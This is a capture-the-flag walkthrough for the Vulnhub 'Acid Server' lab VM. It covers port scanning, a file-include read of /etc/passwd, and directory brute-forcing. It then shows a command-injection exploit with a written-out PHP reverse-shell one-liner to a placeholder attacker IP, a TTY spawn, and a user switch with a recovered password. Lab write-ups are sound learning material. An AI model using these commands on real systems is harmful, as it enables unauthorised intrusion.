Acid Server is a web based vulnerable virtual machine which was designed like a CTF (Catch The Flag) for pentesters. If you are interested in web based exploits, then you are in a right place. The description of ACID Server in Vulnhub is as follows :
Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.
CTF Goal :
Boot2Root (Gain root access)
- VMware or Virtual Box
- Knowledge of webshell
- Internet connection (for googling)
Step 1 :
First of all we don’t know the IP of the ACID server, so we use the utility called netdiscover.
From netdiscover we came to know that IP of the ACID Server is 192.168.207.129
Step 2 :
Now lets scan all the ports of this machine (well this would take a lot of time, so a little advice….run it and have a cup of coffee).
(Oh! the coffee was great) Looks like it took 6250 seconds.
The nmap results shows that port 33447 is open with http service.
Step 3 :
Now lets open it in a browser.
The server’s home page is shown with a directory path on the Title.
If we would view the source of this page then, we can get the 1st Flag.
Step 4 :
Now lets go to the path that was mentioned in the Title (http://192.168.207.129:33447/Challenge/), we would get the following page.
Oops!!! we don’t know the email or the password. What should we do? Lets ask the developers 🙂 They give a big help in understanding the codes.
First of all lets go to the source code of the page.
Now that we got the name of the creators (peredur.net) , lets start googling it. We would get a Github page of the company/creators. In the github page, if we read it, we would find a dummy email and password.
Lets try out the dummy email and password in the login page and we would get a successful login page.
Step 5 :
Lets proceed further, when we click “Click Here to Proceed Further”, we would land on the following page.
It asks for a file name, so we can view any file we want (which is accessible to www-data). But the most relevant is to know the list of users present in the system, so lets hunt for the passwd file.
When we give the path of the passwd file then we get “nothing”. Don’t get confuse here!!
Yoooo!!!! we got a two useful usernames :- acid and saman.
Step 6 :
Now that we are done on the include page, lets get more file and folders on the current folder i.e., Challenge.
Here we would use the tool provided by OWASP called DirBuster.
Note :- DirBuster is very noisy.
This would also take quite a while, so lets go and watch and listen a song which is one of my favorites (its a Japaneses Song), Binks’ Sake
Looks like we got some results.
So, lets move on with the cake.php and we should get the following page.
If we observe carefully at title of this page, then we see a new path i.e., /Magic_Box. But sadly its inaccessible.
Step 7 :
Looks like DirBuster raided the directory and gave use a very nice results.
Lets check the command.php page.
Yoooohhhoooo!!!! Great page right. This page is a jackpot to hackers. Lets play some old school tricks.
The result is hidden in the plain view.
Yupee!! Its injectable. So lets try creating a reverse shell using php, We can get it from google when we search for “one line simple php reverse shell”. Well I tried may codes but the best was :
php -r ‘$sock=fsockopen(“ATTACKING-IP”,80);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Before going to the webshell, we would be using the swiss knife i.e., netcat, for listen on the attacker’s machine.
Now lets start the webshell.
We would get a reverse connection on our listening port of netcat (if everything is correctly filled).
Now lets get a TTY shell by using the following command.
python -c 'import pty; pty.spawn("/bin/bash")'
Now finally we need to get the root access. So we would find something that would be useful to gain the root access, like sudo users. Lets see if we can change user. (As we know who are the users in this system).
Nice we can change the user. As we don’t know the password, lets search for the password. Now where can we find the user’s pass, lets play around for a while.
First lets see, what files are present on the system and find some suspicious files (that should not be present in linux).
Well in root (/) we find s.bin to be suspicious, lets check it out.
Oh! we found something, investigate.php. Lets see what it has to say.
Nice, lets become an investigator and check out other files that are culprit. Lets check what is present in original sbin.
In sbin, raw_vs_isi looks different. What is it? Lets check it out
Oh! we found a hint. What it’s in .pcapng? What should we do? Lets do strings on it.
This is creepy! “saman and now a days he’s … 1337hax0r”. We know that saman is the user and what is 1337hax0r. Lets try it as a password.
Nice its works!!! Now just we need to escalate the privilege.
Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho
Binkusu no sake wo, todoke ni yuku yo ……
I hope you enjoyed the journey and leave some comments.
原文链接( ^_^ ) 解码吧~~ ： aHR0cHM6Ly9zZWN1cmV5b3VyZGlnaXRhbGxpZmUuaW4vYWNpZC1zZXJ2ZXItdm0td2Fsa3Rocm91Z2gv